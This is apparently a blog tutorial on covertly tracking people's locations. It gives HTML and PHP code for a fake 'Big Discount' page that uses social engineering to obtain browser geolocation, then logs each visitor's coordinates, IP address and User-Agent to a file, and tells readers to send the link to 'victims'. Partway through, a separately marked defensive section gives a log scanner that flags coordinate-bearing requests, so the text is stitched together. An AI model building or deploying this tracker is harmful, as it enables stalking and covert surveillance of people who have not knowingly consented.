Tracking Location with Social Engineering and HTML5

TRACKING LOCATION

This article will teach a simple and efficient way to track the location of a user. This is for educational purposes only; I won’t be responsible for what you do with the information.

This works on geolocation (the same method online sites like OLA and UBER use).

HTML5 introduced a very effective feature known as the Geolocation API, which is used to locate a user. The getCurrentPosition() method returns the user’s location. You can read more about this HERE

:: PREREQUISITES ::

  • HTML
  • PHP

:: THE CODE ::


<!DOCTYPE html>
<html>
<body>
<p id="demo"></p>
<script>
document.write ("<h2>Allow location to avail a Big Discount</h2>");
var x = document.getElementById("demo");

function getLocation() {
    if (navigator.geolocation) {
        navigator.geolocation.getCurrentPosition(showPosition);
    } else { 
        x.innerHTML = "Geolocation is not supported by this browser.";
    }
}

function showPosition(position) {
    var lat = position.coords.latitude;
    var lon = position.coords.longitude;

    window.location.href = "submit.php?lati=" + lat + "&longi=" + lon;
}
getLocation();
</script>
</body>
</html>

So the function getLocation() will get the location of the user.

The victim will get a prompt asking them to allow location access. Whether they allow it or not depends entirely on your social engineering tricks.

Hint :: Append the body tag and make a fancy page ;D

window.location.href="submit.php?lati=" + lat + "&longi=" + lon;

The above line will send the latitude and longitude to the submit.php file.


<?php
if (isset($_GET["lati"]) && isset($_GET["longi"]))
{
echo "Congrats! Credit Added";

$myfile = fopen("testfile.txt", "a");
fwrite($myfile, $_SERVER['HTTP_USER_AGENT']);
fwrite($myfile, "\n");
fwrite($myfile, $_SERVER['REMOTE_ADDR']);
fwrite($myfile, "\n");
fwrite($myfile, $_GET["lati"]);
fwrite($myfile, "\n");
fwrite($myfile, $_GET["longi"]);
fwrite($myfile, "\n\n");
fclose($myfile);


}
else
{
echo "An error occurred. Please retry";
}

?>


Apart from the latitude and longitude, the submit.php file also logs the victim’s IP address and User-Agent as a bonus, in a file named testfile.txt 😀
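Seen from the defender's side, the redirect to submit.php places the coordinates in the request's query string, where a web proxy or gateway log records them. The following is an added example, not part of the original article, that flags such requests; the log format, host names, addresses and function names are assumptions made for illustration.

```javascript
// Added example (defender view): flag proxied requests whose query string
// carries a latitude/longitude pair, as in submit.php?lati=...&longi=...
// Matching is on values, not parameter names, since parameter names vary.

// Geolocation API values are decimals with many fractional digits; requiring
// at least 4 avoids matching ids, page numbers and version strings.
const COORD = /^-?\d{1,3}\.\d{4,}$/;

function asCoord(value, limit) {
  if (!COORD.test(value)) return null;
  const n = Number(value);
  return Math.abs(n) <= limit ? n : null;
}

// Returns { host, lat, lon } when two different parameters form a plausible pair.
function findCoordinatePair(rawUrl) {
  let url;
  try { url = new URL(rawUrl); } catch { return null; } // malformed URL
  const values = [...url.searchParams.values()];
  for (let i = 0; i < values.length; i++) {
    for (let j = 0; j < values.length; j++) {
      if (i === j) continue;
      const lat = asCoord(values[i], 90);
      const lon = asCoord(values[j], 180);
      if (lat !== null && lon !== null) return { host: url.hostname, lat, lon };
    }
  }
  return null;
}

// Assumed log format (constructed): "<timestamp> <client-ip> <method> <url>"
function scanLog(lines, allowedHosts = new Set()) {
  const hits = [];
  for (const line of lines) {
    const [time, client, , rawUrl] = line.trim().split(/\s+/);
    const pair = rawUrl ? findCoordinatePair(rawUrl) : null;
    if (pair && !allowedHosts.has(pair.host)) hits.push({ time, client, ...pair });
  }
  return hits;
}

// Constructed sample log lines; all hosts and addresses are placeholders.
const SAMPLE_LOG = [
  "2024-05-01T10:15:02Z 10.0.0.23 GET https://promo.example/submit.php?lati=28.613939&longi=77.209021",
  "2024-05-01T10:15:09Z 10.0.0.41 GET https://shop.example/item?id=1042&page=2",
  "2024-05-01T10:16:30Z 10.0.0.23 GET https://cdn.example/lib.js?v=3.7.1",
  "2024-05-01T10:17:11Z 10.0.0.57 GET https://maps.example/tile?y=-33.868820&x=151.209290",
];

// maps.example stands in for a mapping service the organisation expects.
console.log(scanLog(SAMPLE_LOG, new Set(["maps.example"])));
```

Without the allow-list the mapping request is reported as well, so hits from this kind of rule need triage against the services users are expected to share location with.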

Now our setup is ready. Just upload the files to your web server and send the link.

The victim will get a prompt to allow location access on both PCs and smartphones.

Once allowed, you’ll get the details of your victim, as shown in the image below.

ENJOY !